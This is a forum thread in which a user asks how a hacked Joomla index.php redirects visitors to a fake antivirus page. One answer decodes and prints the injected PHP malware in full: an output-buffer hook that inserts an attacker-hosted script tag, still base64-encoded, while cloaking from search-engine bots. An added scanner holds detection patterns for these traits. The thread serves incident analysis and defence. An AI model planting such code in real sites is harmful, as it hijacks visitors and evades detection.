Fake antivirus redirect

Time: 2011-04-24 04:59:22

Tags: php

My client's website was hacked, and now the main URL redirects to a fake antivirus web page. So for now she has put up an "under construction" message with Joomla. Below is the code of the index.php page, where I hope to find the damn redirect. But I can't. Can anyone help me find it?

    <?php /**/ eval(base64_decode("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"));?><?php
/**
* @version $Id: index.php 6022 2006-12-18 22:30:07Z friesengeist $
* @package Joomla
* @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_VALID_MOS', 1 );

// checks for configuration file, if none found loads installation page
if (!file_exists( 'configuration.php' ) || filesize( 'configuration.php' ) < 10) {
    $self = rtrim( dirname( $_SERVER['PHP_SELF'] ), '/\\' ) . '/';
    header("Location: http://" . $_SERVER['HTTP_HOST'] . $self . "installation/index.php" );
    exit();
}

require( 'globals.php' );
require_once( 'configuration.php' );

// SSL check - $http_host returns <live site url>:<port number if it is 443>
$http_host = explode(':', $_SERVER['HTTP_HOST'] );
if( (!empty( $_SERVER['HTTPS'] ) && strtolower( $_SERVER['HTTPS'] ) != 'off' || isset( $http_host[1] ) && $http_host[1] == 443) && substr( $mosConfig_live_site, 0, 8 ) != 'https://' ) {
    $mosConfig_live_site = 'https://'.substr( $mosConfig_live_site, 7 );
}

require_once( 'includes/joomla.php' );

//Installation sub folder check, removed for work with SVN
if (file_exists( 'installation/index.php' ) && $_VERSION->SVN == 0) {
    define( '_INSTALL_CHECK', 1 );
    include ( $mosConfig_absolute_path .'/offline.php');
    exit();
}

// displays offline/maintanance page or bar
if ($mosConfig_offline == 1) {
    require( $mosConfig_absolute_path .'/offline.php' );
}

// load system bot group
$_MAMBOTS->loadBotGroup( 'system' );

// trigger the onStart events
$_MAMBOTS->trigger( 'onStart' );

if (file_exists( $mosConfig_absolute_path .'/components/com_sef/sef.php' )) {
    require_once( $mosConfig_absolute_path .'/components/com_sef/sef.php' );
} else {
    require_once( $mosConfig_absolute_path .'/includes/sef.php' );
}
require_once( $mosConfig_absolute_path .'/includes/frontend.php' );

// retrieve some expected url (or form) arguments
$option = strval( strtolower( mosGetParam( $_REQUEST, 'option' ) ) );
$Itemid = intval( mosGetParam( $_REQUEST, 'Itemid', null ) );

if ($option == '') {
    if ($Itemid) {
        $query = "SELECT id, link"
        . "\n FROM #__menu"
        . "\n WHERE menutype = 'mainmenu'"
        . "\n AND id = " . (int) $Itemid
        . "\n AND published = 1"
        ;
        $database->setQuery( $query );
    } else {
        $query = "SELECT id, link"
        . "\n FROM #__menu"
        . "\n WHERE menutype = 'mainmenu'"
        . "\n AND published = 1"
        . "\n ORDER BY parent, ordering"
        ;
        $database->setQuery( $query, 0, 1 );
    }
    $menu = new mosMenu( $database );
    if ($database->loadObject( $menu )) {
        $Itemid = $menu->id;
    }
    $link = $menu->link;
    if (($pos = strpos( $link, '?' )) !== false) {
        $link = substr( $link, $pos+1 ). '&Itemid='.$Itemid;
    }
    parse_str( $link, $temp );
    /** this is a patch, need to rework when globals are handled better */
    foreach ($temp as $k=>$v) {
        $GLOBALS[$k] = $v;
        $_REQUEST[$k] = $v;
        if ($k == 'option') {
            $option = $v;
        }
    }
}
if ( !$Itemid ) {
// when no Itemid give a default value
    $Itemid = 99999999;
}

// mainframe is an API workhorse, lots of 'core' interaction routines
$mainframe = new mosMainFrame( $database, $option, '.' );
$mainframe->initSession();

// trigger the onAfterStart events
$_MAMBOTS->trigger( 'onAfterStart' );

// checking if we can find the Itemid thru the content
if ( $option == 'com_content' && $Itemid === 0 ) {
    $id     = intval( mosGetParam( $_REQUEST, 'id', 0 ) );
    $Itemid = $mainframe->getItemid( $id );
}

/** do we have a valid Itemid yet?? */
if ( $Itemid === 0 ) {
    /** Nope, just use the homepage then. */
    $query = "SELECT id"
    . "\n FROM #__menu"
    . "\n WHERE menutype = 'mainmenu'"
    . "\n AND published = 1"
    . "\n ORDER BY parent, ordering"
    ;
    $database->setQuery( $query, 0, 1 );
    $Itemid = $database->loadResult();
}

// patch to lessen the impact on templates
if ($option == 'search') {
    $option = 'com_search';
}

// loads english language file by default
if ($mosConfig_lang=='') {
    $mosConfig_lang = 'english';
}
include_once( $mosConfig_absolute_path .'/language/' . $mosConfig_lang . '.php' );

// frontend login & logout controls
$return     = strval( mosGetParam( $_REQUEST, 'return', NULL ) );
$message    = intval( mosGetParam( $_POST, 'message', 0 ) );
if ($option == 'login') {
    $mainframe->login();

    // JS Popup message
    if ( $message ) {
        ?>
        <script language="javascript" type="text/javascript">
        <!--//
        alert( "<?php echo addslashes( _LOGIN_SUCCESS ); ?>" );
        //-->
        </script>
        <?php
    }

    if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
    // checks for the presence of a return url
    // and ensures that this url is not the registration or login pages
        // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $return );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
        }
    } else {
        // If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $mosConfig_live_site .'/index.php' );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
        }
    }

} else if ($option == 'logout') {
    $mainframe->logout();

    // JS Popup message
    if ( $message ) {
        ?>
        <script language="javascript" type="text/javascript">
        <!--//
        alert( "<?php echo addslashes( _LOGOUT_SUCCESS ); ?>" );
        //-->
        </script>
        <?php
    }

    if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
    // checks for the presence of a return url
    // and ensures that this url is not the registration or logout pages
        mosRedirect( $return );
    } else {
        mosRedirect( $mosConfig_live_site.'/index.php' );
    }
} else if ($option == 'cookiecheck') {
    // No cookie was set upon login. If it is set now, redirect to the given page. Otherwise, show error message.
    if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
        mosRedirect( $return );
    } else {
        mosErrorAlert( _ALERT_ENABLED );
    }
}

/** get the information about the current user from the sessions table */
$my = $mainframe->getUser();

// detect first visit
$mainframe->detect();

// set for overlib check
$mainframe->set( 'loadOverlib', false );

$gid = intval( $my->gid );

// gets template for page
$cur_template = $mainframe->getTemplate();
/** temp fix - this feature is currently disabled */

/** @global A places to store information from processing of the component */
$_MOS_OPTION = array();

// precapture the output of the component
require_once( $mosConfig_absolute_path . '/editor/editor.php' );

ob_start();

if ($path = $mainframe->getPath( 'front' )) {
    $task   = strval( mosGetParam( $_REQUEST, 'task', '' ) );
    $ret    = mosMenuCheck( $Itemid, $option, $task, $gid );

    if ($ret) {
        require_once( $path );
    } else {
        mosNotAuth();
    }
} else {
    header( 'HTTP/1.0 404 Not Found' );
    echo _NOT_EXIST;
}

$_MOS_OPTION['buffer'] = ob_get_contents();

ob_end_clean();

initGzip();

header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );
header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' );
header( 'Cache-Control: no-store, no-cache, must-revalidate' );
header( 'Cache-Control: post-check=0, pre-check=0', false );
header( 'Pragma: no-cache' );

// display the offline alert if an admin is logged in
if (defined( '_ADMIN_OFFLINE' )) {
    include( $mosConfig_absolute_path .'/offlinebar.php' );
}

// loads template file
if ( !file_exists( $mosConfig_absolute_path .'/templates/'. $cur_template .'/index.php' ) ) {
    echo _TEMPLATE_WARN . $cur_template;
} else {
    require_once( $mosConfig_absolute_path .'/templates/'. $cur_template .'/index.php' );
    echo '<!-- '. time() .' -->';
}

// displays queries performed for page
if ($mosConfig_debug) {
    echo $database->_ticker . ' queries executed';
    echo '<pre>';
    foreach ($database->_log as $k=>$sql) {
        echo $k+1 . "\n" . $sql . '<hr />';
    }
    echo '</pre>';
}

doGzip();
?>

3 answers:

Answer 0 (score: 3)

That bit at the beginning with the exec(base64_decode()) crap is your target. Not part of your CMS, and shady as hell.

Remove it and be happy. Then update the Drupal instance, change the root and user passwords, and subscribe to the Drupal dev update RSS so you can stop this from happening again.

Answer 1 (score: 2)

So, assuming you want to know how the one-liner works, I went and decoded the base 64 string, which is evaluated as PHP code. It gives the following code

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){$GLOBALS['mr_no']=1;if(!function_exists('mrobh')){if(!function_exists('gml')){function gml(){if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY3Jvc3N1bml2ZXJzZWl0YmVvcmcuY29tL21tLnBocCI+PC9zY3JpcHQ+");}return "";}}if(!function_exists('gzdecode')){function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));$RBE4C4D037E939226F65812885A53DAD9=10;$RA3D52E52A48936CDE0F5356BB08652F2=0;if($R30B2AB8DC1496D06B230A71D8962AF5D&4){$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;}if($R30B2AB8DC1496D06B230A71D8962AF5D&8){$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;}if($R30B2AB8DC1496D06B230A71D8962AF5D&16){$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;}if($R30B2AB8DC1496D06B230A71D8962AF5D&2){$RBE4C4D037E939226F65812885A53DAD9+=2;}$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;}return $R034AE2AB94F99CC81B389A1822DA3353;}}function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){Header('Content-Encoding: none');$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);}else{return 
$RA179ABD3A7B9E28C369F7B59C51B81DE.gml();}}ob_start('mrobh');}}

Strip out all the whitespace and the names of variables like $RA179ABD3A7B9E28C369F7B59C51B81DE. After cleaning it up a bit, the code looks like this:

<?php

if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
    $GLOBALS['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        if (!function_exists('gml')) {
            function gml()
            {
                if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                    return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY3Jvc3N1bml2ZXJzZWl0YmVvcmcuY29tL21tLnBocCI+PC9zY3JpcHQ+");
                }

                return "";
            }
        }

        if (!function_exists('gzdecode')) {
            function gzdecode($encoded)
            {
                $bitmask = @ord(@substr($encoded, 3, 1));
                $ten = 10;
                $zero = 0;
                if ($bitmask & 4) {
                    $temp = @unpack('v', substr($encoded, 10, 2));
                    $temp = $temp[1];
                    $ten += 2 + $temp;
                }

                if ($bitmask & 8) {
                    $ten = @strpos($encoded, chr(0) , $ten) + 1;
                }

                if ($bitmask & 16) {
                    $ten = @strpos($encoded, chr(0) , $ten) + 1;
                }

                if ($bitmask & 2) {
                    $ten+= 2;
                }

                $inflated = @gzinflate(@substr($encoded, $ten));
                if ($inflated === FALSE) {
                    $inflated = $encoded;
                }

                return $inflated;
            }
        }

        function mrobh($input)
        {
            Header('Content-Encoding: none');
            $decoded = gzdecode($input);
            if (preg_match('/\<\/body/si', $decoded)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $decoded);
            }
            else {
                return $decoded . gml();
            }
        }

        ob_start('mrobh');
    }
}

A lot of this code consists of guards: a global is set so that the code executes only once, even if the statement appears multiple times, and it makes sure all functions are defined only once.

The crux is in the last line: it uses the ob_start function to ensure the mrobh function is executed

when the output buffer is flushed (sent) or cleaned (with ob_flush(), ob_clean() or similar function) or when the output buffer is flushed to the browser at the end of the request.

This means that instead of directly outputting the result of the original script, all generated output is buffered and at the end passed to mrobh.

Note how the original script ends with doGzip();, so all the HTML that the mrobh function receives is gzip compressed. So the first thing it needs to do is decode it, which is where the gzdecode function comes from. After that $decoded has the plain HTML output of the default Joomla script, probably with <html><head> tags and so on. In that case there should also be a </body> tag. In the final if statement, that closing tag is replaced by the output of the gml() function. That function again decodes a base 64 string, which results in

<script src="http://***URL censored***"></script>

So instead of

    regular output...
  </body>
</html>

the end of the output now looks like

    regular output...
    <script src="http://***URL censored***"></script>
  </body>
</html>

so that the script at that URL is loaded when the browser parses the returned HTML.

Note that the gml function also has an extra guard to make sure the redirect doesn't happen whenever a Google or Yahoo bot visits the page - those search engines would detect that something malicious is going on and warn users (if they use Chrome, even before they actually visit the page). The else clause in mrobh is just another safety measure for the case where the HTML doesn't contain a </body> tag - in that case the script tag is simply appended to the end of whatever output there is, assuming the browser renders it as HTML.

So what you end up with is your regular page, with an extra script tag. (Un)fortunately the domain it tries to load the JavaScript from no longer seems to exist, so we can't see what the script does, but since you say users are redirected away from your site, it's safe to assume it contains some tracking code followed by

window.location.href = "http://mymaliciouspage";

TL;DR: The first line contains malicious code that cleverly manipulates your page output to redirect users (but not any search engine bots).

Solution: just replace that whole first line with the original <?php (which you still see at the end of the bad code) and that fixes this problem (check your server's security and update Joomla to avoid getting hit again).
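To turn the analysis in the answer above into something a responder can run over a web root, here is an added example (my code, not the asker's file or anything from the Joomla project) that finds eval(base64_decode("...")) one-liners in PHP source, decodes the payload, flags the traits the answer describes (an output-buffer callback, googlebot/yahoo user-agent cloaking, a </body> rewrite, a run-once flag) and pulls any URL out of base64 strings nested inside the payload. The real blob from the question was stripped from this page, so the infected file below is constructed: a trimmed payload in the same style, pointing at the reserved placeholder host example.invalid. The indicator names and the function names are mine.

```python
import base64
import re

# --- Constructed sample (not the page's real payload, which was stripped from the post) ---

def b64(text):
    """Base64-encode a str the way the injector does, returning ASCII text."""
    return base64.b64encode(text.encode()).decode()

# What gml() in the decoded code returns: a script tag pointing at the attacker's host.
# example.invalid is a reserved placeholder domain, not the real one from the post.
SCRIPT_TAG = '<script src="http://example.invalid/mm.php"></script>'

# A trimmed-down payload in the style of the decoded one-liner: run-once flag,
# user-agent cloaking, and an output-buffer callback that rewrites </body>.
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){$GLOBALS['mr_no']=1;"
    "function gml(){if(!stristr($_SERVER['HTTP_USER_AGENT'],'googlebot')){"
    "return base64_decode('" + b64(SCRIPT_TAG) + "');}return '';}"
    "function mrobh($b){return preg_replace('/(\\<\\/body[^\\>]*\\>)/si',gml().\"\\n\".'$1',$b);}"
    "ob_start('mrobh');}"
)

# The infected file: the injected one-liner prepended to an otherwise normal index.php.
SAMPLE_FILE = (
    '<?php /**/ eval(base64_decode("' + b64(SAMPLE_PAYLOAD) + '"));?><?php\n'
    "/**\n * @package Joomla\n */\n"
    "define( '_VALID_MOS', 1 );\n"
)

# --- Scanner ---

EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)\s*\)", re.I)
INNER_B64 = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc=[\"']([^\"']+)", re.I)

# Traits of the injector described in the answer; the names are mine.
INDICATORS = {
    "output_buffer_callback": re.compile(r"ob_start\s*\(\s*[\"']\w+[\"']\s*\)"),
    "search_engine_cloaking": re.compile(r"HTTP_USER_AGENT.*?(googlebot|yahoo)", re.I | re.S),
    "body_tag_rewrite": re.compile(r"<\\?/body", re.I),   # matches </body or the escaped \</body
    "run_once_flag": re.compile(r"\$GLOBALS\s*\[\s*[\"']\w+[\"']\s*\]\s*=\s*1"),
}


def decode_b64(blob):
    """Strictly decode a base64 blob; return None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except ValueError:          # binascii.Error and UnicodeDecodeError both derive from it
        return None


def scan_php(source):
    """Return one finding per eval(base64_decode(...)) in `source`, with the line it
    sits on, the decoded payload's traits and any URLs hidden in nested base64."""
    findings = []
    for m in EVAL_B64.finditer(source):
        payload = decode_b64(m.group(1))
        if payload is None:
            continue
        embedded = [s for s in (decode_b64(i.group(1)) for i in INNER_B64.finditer(payload))
                    if s is not None]
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "payload_length": len(payload),
            "indicators": [name for name, rx in INDICATORS.items() if rx.search(payload)],
            "embedded_strings": embedded,
            "script_srcs": SCRIPT_SRC.findall(" ".join(embedded)),
        })
    return findings


if __name__ == "__main__":
    for f in scan_php(SAMPLE_FILE):
        print("line %d: eval(base64_decode()) payload, %d bytes" % (f["line"], f["payload_length"]))
        print("  traits:", ", ".join(f["indicators"]))
        print("  loads :", ", ".join(f["script_srcs"]))
```

Point scan_php at each file under the web root rather than at SAMPLE_FILE to triage a real install; the decoded payload is only inspected with regular expressions, never executed, and a hit on the first line of index.php with the output_buffer_callback trait is exactly the pattern the answer describes. The decoder is strict on purpose: validate=True rejects blobs with stray characters, so a truncated or hand-edited one-liner is reported as undecodable rather than silently mis-decoded.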

Answer 2 (score: 1)

You've been hacked. You can no longer trust any code on the server. Nuke it. Redeploy the current version. Apply patches to fix the security holes, e.g. upgrade Joomla to its latest version, and do another deployment.

Just editing your hacked code base will get you into trouble. Don't do that.

The security problem still exists, and you don't know what else is on the server.